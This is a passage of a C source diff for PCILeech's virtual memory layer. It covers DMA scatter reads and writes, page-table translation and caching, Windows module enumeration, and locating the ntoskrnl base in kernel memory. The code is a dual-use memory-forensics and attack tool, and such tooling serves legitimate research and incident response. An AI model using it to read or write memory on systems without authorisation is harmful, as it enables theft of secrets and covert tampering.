+            memcpy(pDMA_Virt->pb, pDMA_Phys->pb, 0x1000);
+            (QWORD)pDMA_Virt->pvReserved1 = 1;
+        } else {
+            // not in cache - add to requesting queue
+            ppDMAsPhysCacheEntry[cpDMAsPhys] = VmmCacheReserve(ctxVmm->ptPHYS);
+            ppDMAsPhys[cpDMAsPhys] = &ppDMAsPhysCacheEntry[cpDMAsPhys]->h;
+            ppDMAsPhys[cpDMAsPhys]->cb = 0;
+            ppDMAsPhys[cpDMAsPhys]->qwA = (QWORD)pDMA_Virt->pvReserved2;
+            (QWORD)ppDMAsPhys[cpDMAsPhys]->pvReserved1 = i;
+            (QWORD)ppDMAsPhys[cpDMAsPhys]->pvReserved2 = pDMA_Virt->qwA;
+            cpDMAsPhys++;
+        }
+        // physical read if requesting queue is full of if this is last
+        if(cpDMAsPhys && ((cpDMAsPhys == cPagesPerScatterRead) || (i == cpDMAsVirt - 1))) {
+            // SPECULATIVE FUTURE READ IF NEGLIGIBLE PERFORMANCE LOSS
+            while(cpDMAsPhys < min(0x18, cPagesPerScatterRead)) {
+                qwVA = 0x1000 + (QWORD)ppDMAsPhys[cpDMAsPhys - 1]->pvReserved2;
+                result = VmmVirt2Phys(ctxVmm, pProcess, qwVA, &qwPA);
+                if(!result) { break; }
+                ppDMAsPhysCacheEntry[cpDMAsPhys] = VmmCacheReserve(ctxVmm->ptPHYS);
+                ppDMAsPhys[cpDMAsPhys] = &ppDMAsPhysCacheEntry[cpDMAsPhys]->h;
+                ppDMAsPhys[cpDMAsPhys]->cb = 0;
+                ppDMAsPhys[cpDMAsPhys]->qwA = qwPA;
+                (QWORD)ppDMAsPhys[cpDMAsPhys]->pvReserved1 = (QWORD)-1;
+                (QWORD)ppDMAsPhys[cpDMAsPhys]->pvReserved2 = qwVA;
+                cpDMAsPhys++;
+            }
+            // physical memory access
+            DeviceReadScatterDMA(ctxVmm->ctxPcileech, ppDMAsPhys, (DWORD)cpDMAsPhys, NULL);
+            for(j = 0; j < cpDMAsPhys; j++) {
+                VmmCachePut(ctxVmm->ptPHYS, ppDMAsPhysCacheEntry[j]);
+                pDMA_Phys = &ppDMAsPhysCacheEntry[j]->h;
+                if((QWORD)pDMA_Phys->pvReserved1 < cpDMAsVirt) {
+                    pDMA_Virt = ppDMAsVirt[(QWORD)pDMA_Phys->pvReserved1];
+                    pDMA_Virt->cb = pDMA_Phys->cb;
+                    memcpy(pDMA_Virt->pb, pDMA_Phys->pb, 0x1000);
+                }
+            }
+            cpDMAsPhys = 0;
+        }
+    }
+}
+
+// ----------------------------------------------------------------------------
+// PUBLICALLY VISIBLE FUNCTIONALITY RELATED TO VMMU.
+// ----------------------------------------------------------------------------
+
+VOID VmmCloseVmm(_In_ PVMM_CONTEXT ctxVmm)
+{
+    if(!ctxVmm) { return; }
+    if(ctxVmm->ThreadProcCache.fEnabled) {
+        ctxVmm->ThreadProcCache.fEnabled = FALSE;
+        while(ctxVmm->ThreadProcCache.hThread) {
+            SwitchToThread();
+        }
+    }
+    VmmProcessCloseTable(ctxVmm->ptPROC, TRUE);
+    VmmCacheClose(ctxVmm->ptTLB);
+    VmmCacheClose(ctxVmm->ptPHYS);
+    DeleteCriticalSection(&ctxVmm->MasterLock);
+    LocalFree(ctxVmm);
+}
+
+VOID VmmClose(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    VmmCloseVmm(ctx->hVMM);
+    ctx->hVMM = NULL;    
+}
+
+VOID VmmWriteEx(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Out_ PBYTE pb, _In_ DWORD cb, _Out_opt_ PDWORD pcbWrite)
+{
+    DWORD i = 0, oVA = 0, cbWrite = 0, cbP, cDMAs;
+    PBYTE pbBuffer;
+    PDMA_IO_SCATTER_HEADER pDMAs, *ppDMAs;
+    if(pcbWrite) { *pcbWrite = 0; }
+    // allocate
+    cDMAs = (DWORD)(((qwVA & 0xfff) + cb + 0xfff) >> 12);
+    pbBuffer = (PBYTE)LocalAlloc(LMEM_ZEROINIT, cDMAs * (sizeof(DMA_IO_SCATTER_HEADER) + sizeof(PDMA_IO_SCATTER_HEADER)));
+    if(!pbBuffer) { return; }
+    pDMAs = (PDMA_IO_SCATTER_HEADER)pbBuffer;
+    ppDMAs = (PPDMA_IO_SCATTER_HEADER)(pbBuffer + cDMAs * sizeof(DMA_IO_SCATTER_HEADER));
+    // prepare pages
+    while(oVA < cb) {
+        ppDMAs[i] = &pDMAs[i];
+        pDMAs[i].qwA = qwVA + oVA;
+        cbP = 0x1000 - ((qwVA + oVA) & 0xfff);
+        cbP = min(cbP, cb - oVA);
+        pDMAs[i].cbMax = cbP;
+        pDMAs[i].pb = pb + oVA;
+        oVA += cbP;
+        i++;
+    }
+    // write and count result
+    VmmWriteScatterVirtual(ctxVmm, pProcess, ppDMAs, cDMAs);
+    if(pcbWrite) {
+        for(i = 0; i < cDMAs; i++) {
+            cbWrite += pDMAs[i].cb;
+        }
+        *pcbWrite = cbWrite;
+    }
+    LocalFree(pbBuffer);
+}
+
+BOOL VmmWrite(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Out_ PBYTE pb, _In_ DWORD cb)
+{
+    DWORD cbWrite;
+    VmmWriteEx(ctxVmm, pProcess, qwVA, pb, cb, &cbWrite);
+    return (cbWrite == cb);
+}
+
+VOID VmmReadEx(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Inout_ PBYTE pb, _In_ DWORD cb, _Out_opt_ PDWORD pcbReadOpt)
+{
+    DWORD cbP, cDMAs, cbRead = 0;
+    PBYTE pbBuffer;
+    PDMA_IO_SCATTER_HEADER pDMAs, *ppDMAs;
+    QWORD i, oVA;
+    if(pcbReadOpt) { *pcbReadOpt = 0; }
+    cDMAs = (DWORD)(((qwVA & 0xfff) + cb + 0xfff) >> 12);
+    pbBuffer = (PBYTE)LocalAlloc(LMEM_ZEROINIT, 0x2000 + cDMAs * (sizeof(DMA_IO_SCATTER_HEADER) + sizeof(PDMA_IO_SCATTER_HEADER)));
+    if(!pbBuffer) { return; }
+    pDMAs = (PDMA_IO_SCATTER_HEADER)(pbBuffer + 0x2000);
+    ppDMAs = (PPDMA_IO_SCATTER_HEADER)(pbBuffer + 0x2000 + cDMAs * sizeof(DMA_IO_SCATTER_HEADER));
+    oVA = qwVA & 0xfff;
+    // prepare "middle" pages
+    for(i = 0; i < cDMAs; i++) {
+        ppDMAs[i] = &pDMAs[i];
+        pDMAs[i].qwA = qwVA - oVA + (i << 12);
+        pDMAs[i].cbMax = 0x1000;
+        pDMAs[i].pb = pb - oVA + (i << 12);
+    }
+    // fixup "first/last" pages
+    pDMAs[0].pb = pbBuffer;
+    if(cDMAs > 1) {
+        pDMAs[cDMAs - 1].pb = pbBuffer + 0x1000;
+    }
+    // Read VMM and handle result
+    VmmReadScatterVirtual(ctxVmm, pProcess, ppDMAs, cDMAs);
+    for(i = 0; i < cDMAs; i++) {
+        if(pDMAs[i].cb == 0x1000) {
+            cbRead += 0x1000;
+        } else {
+            ZeroMemory(pDMAs[i].pb, 0x1000);
+        }
+    }
+    cbRead -= (pDMAs[0].cb == 0x1000) ? 0x1000 : 0;                             // adjust byte count for first page (if needed)
+    cbRead -= ((cDMAs > 1) && (pDMAs[cDMAs - 1].cb == 0x1000)) ? 0x1000 : 0;    // adjust byte count for last page (if needed)
+    // Handle first page
+    cbP = (DWORD)min(cb, 0x1000 - oVA);
+    if(pDMAs[0].cb == 0x1000) {        
+        memcpy(pb, pDMAs[0].pb + oVA, cbP);
+        cbRead += cbP;
+    } else {
+        ZeroMemory(pb, cbP);
+    }
+    // Handle last page
+    if(cDMAs > 1) {
+        cbP = (((qwVA + cb) & 0xfff) ? ((qwVA + cb) & 0xfff) : 0x1000);
+        if(pDMAs[cDMAs - 1].cb == 0x1000) {
+            memcpy(pb + (cDMAs << 12) - oVA - 0x1000, pDMAs[cDMAs - 1].pb, cbP);
+            cbRead += cbP;
+        } else {
+            ZeroMemory(pb + (cDMAs << 12) - oVA - 0x1000, cbP);
+        }
+    }
+    if(pcbReadOpt) { *pcbReadOpt = cbRead; }
+    LocalFree(pbBuffer);
+}
+
+BOOL VmmRead(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Out_ PBYTE pb, _In_ DWORD cb)
+{
+    DWORD cbRead;
+    VmmReadEx(ctxVmm, pProcess, qwVA, pb, cb, &cbRead);
+    return (cbRead == cb);
+}
+
+BOOL VmmReadPage(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Inout_bytecount_(4096) PBYTE pbPage)
+{
+    DMA_IO_SCATTER_HEADER hDMA;
+    PDMA_IO_SCATTER_HEADER pDMA = &hDMA;
+    pDMA->qwA = qwVA;
+    pDMA->pb = pbPage;
+    pDMA->cb = 0;
+    pDMA->cbMax = 0x1000;
+    VmmReadScatterVirtual(ctxVmm, pProcess, &pDMA, 1);
+    return (pDMA->cb == 0x1000);
+}
+
+BOOL VmmInitialize(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    PVMM_CONTEXT ctxVmm;
+    if(!ctx->cfg->dev.fScatterReadSupported) { return FALSE; }
+    // 1: allocate & initialize
+    if(ctx->hVMM) { VmmClose(ctx); }
+    ctxVmm = (PVMM_CONTEXT)LocalAlloc(LMEM_ZEROINIT, sizeof(VMM_CONTEXT));
+    if(!ctxVmm) { goto fail; }
+    // 2: CACHE INIT: Process Table
+    VmmProcessCreateTable(ctxVmm);
+    if(!ctxVmm->ptPROC) { goto fail; }
+    // 3: CACHE INIT: Translation Lookaside Buffer (TLB) Cache Table
+    ctxVmm->ptTLB = VmmCacheInitialize(VMM_CACHE_TLB_ENTRIES);
+    if(!ctxVmm->ptTLB) { goto fail; }
+    // 3: CACHE INIT: Physical Memory Cache Table
+    ctxVmm->ptPHYS = VmmCacheInitialize(VMM_CACHE_PHYS_ENTRIES);
+    if(!ctxVmm->ptPHYS) { goto fail; }
+    // 4: OTHER INIT:
+    ctxVmm->fReadOnly = (ctx->cfg->dev.tp == PCILEECH_DEVICE_FILE);
+    InitializeCriticalSection(&ctxVmm->MasterLock);
+    ctxVmm->ctxPcileech = ctx;
+    ctx->hVMM = ctxVmm;
+    return TRUE;
+fail:
+    if(ctxVmm) { VmmCloseVmm(ctxVmm); }
+    return FALSE;
+}
+
+#endif /* WIN32 */
+#if defined(LINUX) || defined(ANDROID)
+
+#include "vmm.h"
+
+VOID VmmClose(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    return;
+}
+
+#endif /* LINUX || ANDROID */
diff --git a/pcileech/vmm.h b/pcileech/vmm.h
new file mode 100644
index 0000000..48cc9de
--- /dev/null
+++ b/pcileech/vmm.h
@@ -0,0 +1,300 @@
+// vmm.h : definitions related to virtual memory management support.
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#ifndef __VMM_H__
+#define __VMM_H__
+#include "pcileech.h"
+#include "vfs.h"
+
+#ifdef WIN32
+
+// ----------------------------------------------------------------------------
+// VMM configuration constants and struct definitions below:
+// ----------------------------------------------------------------------------
+
+#define VMM_PROCESSTABLE_ENTRIES_MAX    0x4000
+#define VMM_PROCESS_OS_ALLOC_PTR_MAX    0x2    // max number of operating system specific pointers that must be free'd
+#define VMM_MEMMAP_ENTRIES_MAX          0x4000
+
+#define VMM_MEMMAP_FLAG_PAGE_W          0x0000000000000002
+#define VMM_MEMMAP_FLAG_PAGE_NS         0x0000000000000004
+#define VMM_MEMMAP_FLAG_PAGE_NX         0x8000000000000000
+#define VMM_MEMMAP_FLAG_PAGE_MASK       0x8000000000000006
+
+#define VMM_CACHE_TABLESIZE             0x4011  // (not even # to prevent clogging at specific table 'hash' buckets)
+#define VMM_CACHE_TLB_ENTRIES           0x4000  // -> 64MB of cached data
+#define VMM_CACHE_PHYS_ENTRIES          0x4000  // -> 64MB of cached data
+
+typedef struct tdVMM_MEMMAP_ENTRY {
+    QWORD AddrBase;
+    QWORD cPages;
+    QWORD fPage;
+    CHAR  szName[32];
+} VMM_MEMMAP_ENTRY, *PVMM_MEMMAP_ENTRY;
+
+typedef struct tdVMM_PROCESS {
+    DWORD dwPID;
+    DWORD dwState;          // state of process, 0 = running
+    QWORD paPML4;
+    CHAR szName[16];
+    BOOL _i_fMigrated;
+    BOOL fUserOnly;
+    BOOL fSpiderPageTableDone;
+    // memmap related pointers (free must be called separately)
+    QWORD cMemMap;
+    PVMM_MEMMAP_ENTRY pMemMap;
+    PBYTE pbMemMapDisplayCache;
+    QWORD cbMemMapDisplayCache;
+    QWORD Virt2Phys_VA;
+    QWORD Virt2Phys_PA;
+    union {
+        struct{
+            PVOID pvReserved[VMM_PROCESS_OS_ALLOC_PTR_MAX]; // os-specific buffer to be allocated if needed (free'd by VmmClose)
+        } unk;
+        struct {
+            PBYTE pbLdrModulesDisplayCache;
+            PVOID pbReserved[VMM_PROCESS_OS_ALLOC_PTR_MAX - 1];
+            DWORD cbLdrModulesDisplayCache;
+            QWORD vaEPROCESS;
+            QWORD vaPEB;
+            QWORD vaENTRY;
+        } win;
+    } os;
+} VMM_PROCESS, *PVMM_PROCESS;
+
+typedef struct tdVMM_PROCESS_TABLE {
+    SIZE_T c;
+    WORD iFLink;
+    WORD iFLinkM[VMM_PROCESSTABLE_ENTRIES_MAX];
+    PVMM_PROCESS M[VMM_PROCESSTABLE_ENTRIES_MAX];
+    struct tdVMM_PROCESS_TABLE *ptNew;
+} VMM_PROCESS_TABLE, *PVMM_PROCESS_TABLE;
+
+#define VMM_CACHE_ENTRY_MAGIC 0x29d50298c4921034
+
+typedef struct tdVMM_CACHE_ENTRY {
+    QWORD qwMAGIC;
+    struct tdVMM_CACHE_ENTRY *FLink;
+    struct tdVMM_CACHE_ENTRY *BLink;
+    struct tdVMM_CACHE_ENTRY *AgeFLink;
+    struct tdVMM_CACHE_ENTRY *AgeBLink;
+    QWORD tm;
+    DMA_IO_SCATTER_HEADER h;
+    BYTE pb[0x1000];
+} VMM_CACHE_ENTRY, *PVMM_CACHE_ENTRY, **PPVMM_CACHE_ENTRY;
+
+typedef struct tdVMM_CACHE_TABLE {
+    PVMM_CACHE_ENTRY M[VMM_CACHE_TABLESIZE];
+    PVMM_CACHE_ENTRY AgeFLink;
+    PVMM_CACHE_ENTRY AgeBLink;
+    PVMM_CACHE_ENTRY S;
+} VMM_CACHE_TABLE, *PVMM_CACHE_TABLE;
+
+
+typedef struct tdVMM_CONTEXT {
+    PPCILEECH_CONTEXT ctxPcileech;
+    CRITICAL_SECTION MasterLock;
+    PVMM_PROCESS_TABLE ptPROC;
+    PVMM_CACHE_TABLE ptTLB;
+    PVMM_CACHE_TABLE ptPHYS;
+    BOOL fReadOnly;
+    // os specific below:
+    BOOL fWin;
+    BOOL fUnknownX64;
+    struct {
+        BOOL fEnabled;
+        HANDLE hThread;
+    } ThreadProcCache;
+} VMM_CONTEXT, *PVMM_CONTEXT;
+
+// ----------------------------------------------------------------------------
+// VMM function definitions below:
+// ----------------------------------------------------------------------------
+
+/*
+* Write a virtually contigious arbitrary amount of memory.
+* -- ctxVmm
+* -- pProcess
+* -- qwVA
+* -- pb
+* -- cb
+* -- return = TRUE on success, FALSE on partial or zero write.
+*/
+BOOL VmmWrite(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Out_ PBYTE pb, _In_ DWORD cb);
+
+/*
+* Read a virtually contigious arbitrary amount of memory.
+* -- ctxVmm
+* -- pProcess
+* -- qwVA
+* -- pb
+* -- cb
+* -- return
+*/
+BOOL VmmRead(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Out_ PBYTE pb, _In_ DWORD cb);
+
+/*
+* Read a virtually contigious arbitrary amount of memory and report the number
+* of bytes read in pcbRead.
+* -- ctxVmm
+* -- pProcess
+* -- qwVA
+* -- pb
+* -- cb
+* -- pcbRead
+*/
+VOID VmmReadEx(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Inout_ PBYTE pb, _In_ DWORD cb, _Out_opt_ PDWORD pcbReadOpt);
+
+/*
+* Read a single 4096-byte page of virtual memory.
+* -- ctxVmm
+* -- pProcess
+* -- qwVA
+* -- pbPage
+* -- return
+*/
+BOOL VmmReadPage(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Inout_bytecount_(4096) PBYTE pbPage);
+
+/*
+* Scatter read virtual memory. Non contiguous 4096-byte pages.
+* -- ctxVmm
+* -- pProcess
+* -- ppDMAsVirt
+* -- cpDMAsVirt
+*/
+VOID VmmReadScatterVirtual(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAsVirt, _In_ DWORD cpDMAsVirt);
+
+/*
+* Translate a virtual address to a physical address by walking the page tables.
+* -- ctxVmm
+* -- pProcess
+* -- qwVA
+* -- pqwPA
+* -- return
+*/
+_Success_(return)
+BOOL VmmVirt2Phys(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Out_ PQWORD pqwPA);
+
+/*
+* Spider the TLB (page table cache) to load all page table pages into the cache.
+* This is done to speed up various subsequent virtual memory accesses.
+* NB! pages may fall out of the cache if it's in heavy use or doe to timing.
+* -- ctxVmm
+* -- qwPML4     = physical adderss of the Page Mapping Level 4 table to spider.
+* -- fUserOnly  = only spider user-mode (ring3) pages, no kernel pages.
+*/
+VOID VmmTlbSpider(_Inout_ PVMM_CONTEXT ctxVmm, _In_ QWORD qwPML4, _In_ BOOL fUserOnly);
+
+/*
+* Try verify that a supplied page table in pb is valid by analyzing it.
+* -- ctxVmm
+* -- pb = 0x1000 bytes containing the page table page.
+* -- pa = physical address if the page table page.
+* -- fSelfRefReq = is a self referential entry required to be in the map? (PML4 for Windows).
+*/
+BOOL VmmTlbPageTableVerify(_Inout_ PVMM_CONTEXT ctxVmm, _Inout_ PBYTE pb, _In_ QWORD pa, _In_ BOOL fSelfRefReq);
+
+/*
+* Retrieve a page table (0x1000 bytes) via the TLB cache.
+* -- ctxVmm
+* -- qwPA
+* -- fCacheOnly = if set do not make a request to underlying device if not in cache.
+* -- return
+*/
+PBYTE VmmTlbGetPageTable(_In_ PVMM_CONTEXT ctxVmm, _In_ QWORD qwPA, _In_ BOOL fCacheOnly);
+
+/*
+* Initialize the memory map for a specific process. This may take some time
+* especially for kernel/system processes.
+* -- ctxVmm
+* -- pProcess
+*/
+VOID VmmMapInitialize(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess);
+
+/*
+* Map a tag into the sorted memory map in O(log2) operations. Supply only one
+* of szTag or wszTag. Tags are usually module/dll name.
+* -- ctxVmm
+* -- pProcess
+* -- vaBase
+* -- vaLimit = limit == vaBase + size (== top address in range +1)
+* -- szTag
+* -- wszTag
+*/
+VOID VmmMapTag(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD vaBase, _In_ QWORD vaLimit, _In_opt_ LPSTR szTag, _In_opt_ LPWSTR wszTag);
+
+/*
+* Retrieve a memory map entry info given a specific address.
+* -- pProcess
+* -- qwVA
+* -- return = the memory map entry or NULL if not found.
+*/
+PVMM_MEMMAP_ENTRY VmmMapGetEntry(_In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA);
+
+/*
+* Generate the human-readable text byte-buffer representing an already existing
+* memory map in the process. This memory map must have been initialized with a
+* separate call to VmmMapInitialize.
+* -- pProcess
+*/
+VOID VmmMapDisplayBufferGenerate(_In_ PVMM_PROCESS pProcess);
+
+
+/*
+* Create or re-create the entire process table. This will clean the complete and
+* all existing processes will be cleared.
+* -- ctxVmm
+* -- return
+*/
+BOOL VmmProcessCreateTable(_In_ PVMM_CONTEXT ctxVmm);
+
+/*
+* Retrieve an existing process given a process id (PID).
+* -- ctxVmm
+* -- dwPID
+* -- return = a process struct, or NULL if not found.
+*/
+PVMM_PROCESS VmmProcessGet(_In_ PVMM_CONTEXT ctxVmm, _In_ DWORD dwPID);
+
+/*
+* Create a new process item. New process items are created in a separate data
+* structure and won't become visible to the "Process" functions until after the
+* VmmProcessCreateFinish have been called.
+*/
+PVMM_PROCESS VmmProcessCreateEntry(_In_ PVMM_CONTEXT ctxVmm, _In_ DWORD dwPID, _In_ DWORD dwState, _In_ QWORD paPML4, _In_ CHAR szName[16], _In_ BOOL fUserOnly, _In_ BOOL fSpiderPageTableDone);
+
+/*
+* Activate the pending, not yet active, processes added by VmmProcessCreateEntry.
+* This will also clear any previous processes.
+* -- ctxVmm
+*/
+VOID VmmProcessCreateFinish(_In_ PVMM_CONTEXT ctxVmm);
+
+/*
+* Clear the specified cache from all entries.
+* -- ctxVmm
+* -- fTLB
+* -- fPHYS
+*/
+VOID VmmCacheClear(_Inout_ _In_ PVMM_CONTEXT ctxVmm, _In_ BOOL fTLB, _In_ BOOL fPHYS);
+
+/*
+* Initialize a new VMM context. This must always be done before calling any
+* other VMM functions. An alternative way to do this is to call the function:
+* VmmProcInitialize.
+* -- ctx
+* -- return
+*/
+BOOL VmmInitialize(_Inout_ PPCILEECH_CONTEXT ctx);
+
+#endif /* WIN32 */
+
+/*
+* Close and clean up the VMM context inside the PCILeech context, if existing.
+* -- ctxPcileech
+*/
+VOID VmmClose(_Inout_ PPCILEECH_CONTEXT ctxPcileech);
+
+#endif /* __VMM_H__ */
diff --git a/pcileech/vmmproc.c b/pcileech/vmmproc.c
new file mode 100644
index 0000000..3fa5e45
--- /dev/null
+++ b/pcileech/vmmproc.c
@@ -0,0 +1,917 @@
+// vfsproc.c : implementation of functions related to operating system and process parsing of virtual memory
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#ifdef WIN32
+#include "vmmproc.h"
+#include "vmm.h"
+#include "device.h"
+#include "util.h"
+#include <Winternl.h>
+
+// ----------------------------------------------------------------------------
+// WINDOWS SPECIFIC PROCESS RELATED FUNCTIONALITY BELOW:
+// ----------------------------------------------------------------------------
+
+typedef struct _LDR_MODULE {
+    LIST_ENTRY          InLoadOrderModuleList;
+    LIST_ENTRY          InMemoryOrderModuleList;
+    LIST_ENTRY          InInitializationOrderModuleList;
+    PVOID               BaseAddress;
+    PVOID               EntryPoint;
+    ULONG               SizeOfImage;
+    UNICODE_STRING      FullDllName;
+    UNICODE_STRING      BaseDllName;
+    ULONG               Flags;
+    SHORT               LoadCount;
+    SHORT               TlsIndex;
+    LIST_ENTRY          HashTableEntry;
+    ULONG               TimeDateStamp;
+} LDR_MODULE, *PLDR_MODULE;
+
+typedef struct tdVMMPROC_WIN_LDRMODULES {
+    QWORD BaseAddress;
+    QWORD EntryPoint;
+    DWORD SizeOfImage;
+    WCHAR wszName[32];
+} VMMPROC_WIN_LDRMODULES, *PVMMPROC_WIN_LDRMODULES;
+
+QWORD VmmProcWindows_GetProcAddress(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD vaModule, _In_ LPSTR lpProcName);
+
+VOID VmmProcWindows_ScanLdrModules(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _Inout_ PVMMPROC_WIN_LDRMODULES pModules, _Out_ PDWORD pcModules, _In_ DWORD cModulesMax)
+{
+    DWORD cModules = 0;
+    QWORD vaModuleLdrFirst, vaModuleLdr = 0;
+    BYTE pbPEB[sizeof(PEB)], pbPEBLdrData[sizeof(PEB_LDR_DATA)], pbLdrModule[sizeof(LDR_MODULE)];
+    PPEB pPEB = (PPEB)pbPEB;
+    PPEB_LDR_DATA pPEBLdrData = (PPEB_LDR_DATA)pbPEBLdrData;
+    PLDR_MODULE pLdrModule = (PLDR_MODULE)pbLdrModule;
+    PVMMPROC_WIN_LDRMODULES pModule;
+    BOOL fVerboseExtra = ctxVmm->ctxPcileech->cfg->fVerboseExtra;
+    *pcModules = 0;
+    if(!pProcess->os.win.vaPEB) { return; }
+    if(!VmmRead(ctxVmm, pProcess, pProcess->os.win.vaPEB, pbPEB, sizeof(PEB))) { return; }
+    if(!VmmRead(ctxVmm, pProcess, (QWORD)pPEB->Ldr, pbPEBLdrData, sizeof(PEB_LDR_DATA))) { return; }
+    vaModuleLdr = vaModuleLdrFirst = (QWORD)pPEBLdrData->InMemoryOrderModuleList.Flink - 0x10; // InLoadOrderModuleList == InMemoryOrderModuleList - 0x10
+    do {
+        if(!VmmRead(ctxVmm, pProcess, vaModuleLdr, pbLdrModule, sizeof(LDR_MODULE))) { break; }
+        pModule = pModules + cModules;
+        pModule->BaseAddress = (QWORD)pLdrModule->BaseAddress;
+        pModule->EntryPoint = (QWORD)pLdrModule->EntryPoint;
+        pModule->SizeOfImage = (DWORD)pLdrModule->SizeOfImage;
+        if(pLdrModule->FullDllName.Length) {
+            if(!VmmRead(ctxVmm, pProcess, (QWORD)pLdrModule->BaseDllName.Buffer, (PBYTE)pModule->wszName, 2 * min(31, pLdrModule->BaseDllName.Length))) { break; }
+        }
+        cModules++;
+        if(fVerboseExtra) {
+            printf("vmmproc.c!VmmProcWindows_ScanLdrModules: %016llx %016llx %016llx %08x %S\n", vaModuleLdr, pModule->BaseAddress, pModule->EntryPoint, pModule->SizeOfImage, pModule->wszName);
+        }
+        vaModuleLdr = (QWORD)pLdrModule->InLoadOrderModuleList.Flink;
+    } while((vaModuleLdr != vaModuleLdrFirst) && (cModules < cModulesMax));
+    *pcModules = cModules;
+}
+
+VOID VmmProcWindows_InitializeLdrModules(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess)
+{
+    PVMMPROC_WIN_LDRMODULES pModules, pModule;
+    PBYTE pbResult;
+    DWORD i, o, cModules;
+    // clear out any previous data
+    if(pProcess->os.win.pbLdrModulesDisplayCache) { 
+        LocalFree(pProcess->os.win.pbLdrModulesDisplayCache);
+        pProcess->os.win.pbLdrModulesDisplayCache = NULL;
+        pProcess->os.win.cbLdrModulesDisplayCache = 0;
+    }
+    pProcess->os.win.vaENTRY = 0;
+    // allocate and enumerate
+    pModules = (PVMMPROC_WIN_LDRMODULES)LocalAlloc(LMEM_ZEROINIT, 512 * sizeof(VMMPROC_WIN_LDRMODULES));
+    if(!pModules) { goto fail; }
+    VmmProcWindows_ScanLdrModules(ctxVmm, pProcess, pModules, &cModules, 512);
+    if(!cModules) { goto fail; }
+    // generate display cache
+    pProcess->os.win.vaENTRY = pModules[0].EntryPoint;
+    pbResult = pProcess->os.win.pbLdrModulesDisplayCache = (PBYTE)LocalAlloc(LMEM_ZEROINIT, 86 * cModules);
+    if(!pbResult) { goto fail; }
+    for(i = 0, o = 0; i < cModules; i++) {
+        pModule = pModules + i;
+        if(!pModule->BaseAddress) { continue; }
+        o += snprintf(
+            pbResult + o,
+            86,
+            "%04x %8x %016llx-%016llx      %S\n",
+            i,
+            pModule->SizeOfImage >> 12,
+            pModule->BaseAddress,
+            pModule->BaseAddress + pModule->SizeOfImage - 1,
+            pModule->wszName
+        );
+    }
+    // update memory map with names
+    for(i = 0; i < cModules; i++) {
+        pModule = pModules + i;
+        VmmMapTag(ctxVmm, pProcess, pModule->BaseAddress, pModule->BaseAddress + pModule->SizeOfImage, NULL, pModule->wszName);
+    }
+    pProcess->os.win.cbLdrModulesDisplayCache = o;
+fail:
+    LocalFree(pModules);
+}
+
+/*
+* Locate the virtual base address of ntoskrnl.exe given any address inside the
+* kernel. Localization will be done by a scan-back method. A maximum of 16MB
+* will be scanned back.
+*/
+QWORD VmmProcWindows_FindNtoskrnl(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pSystemProcess, _In_ QWORD vaKernelEntry)
+{
+    PBYTE pb;
+    QWORD vaBase, oPage, o, vaNtosBase = 0;
+    BOOL fINITKDBG, fPOOLCODE;
+    DWORD cbRead;
+    pb = LocalAlloc(0, 0x200000);
+    if(!pb) { goto cleanup; }
+    // Scan back in 2MB chunks a time, (ntoskrnl.exe is loaded in 2MB pages).
+    for(vaBase = vaKernelEntry & ~0x1fffff; vaBase + 0x02000000 > vaKernelEntry; vaBase -= 0x200000) {
+        VmmReadEx(ctxVmm, pSystemProcess, vaBase, pb, 0x200000, &cbRead);
+        // only fail here if all virtual memory in read fails. reason is that kernel is
+        // properly mapped in memory (with NX MZ header in separate page) with empty
+        // space before next valid kernel pages when running Virtualization Based Security.
+        if(!cbRead) { goto cleanup; }
+        for(oPage = 0; oPage < 0x200000; oPage += 0x1000) {
+            if(*(PWORD)(pb + oPage) == 0x5a4d) { // MZ header
+                fINITKDBG = FALSE;
+                fPOOLCODE = FALSE;
+                for(o = 0; o < 0x1000; o += 8) {
+                    if(*(PQWORD)(pb + oPage + o) == 0x4742444B54494E49) { // INITKDBG
+                        fINITKDBG = TRUE;
+                    }
+                    if(*(PQWORD)(pb + oPage + o) == 0x45444F434C4F4F50) { // POOLCODE
+                        fPOOLCODE = TRUE;
+                    }
+                    if(fINITKDBG && fPOOLCODE) {
+                        vaNtosBase = vaBase + oPage;
+                        goto cleanup;
+                    }
+                }
+            }
+        }
+    }
+cleanup:
+    LocalFree(pb);
+    return vaNtosBase;
+}
+
+/*
+* Perform GetProcAddress given a PE header.
+* NB! very messy code due to lots of sanity checks on untrusted data.
+*/
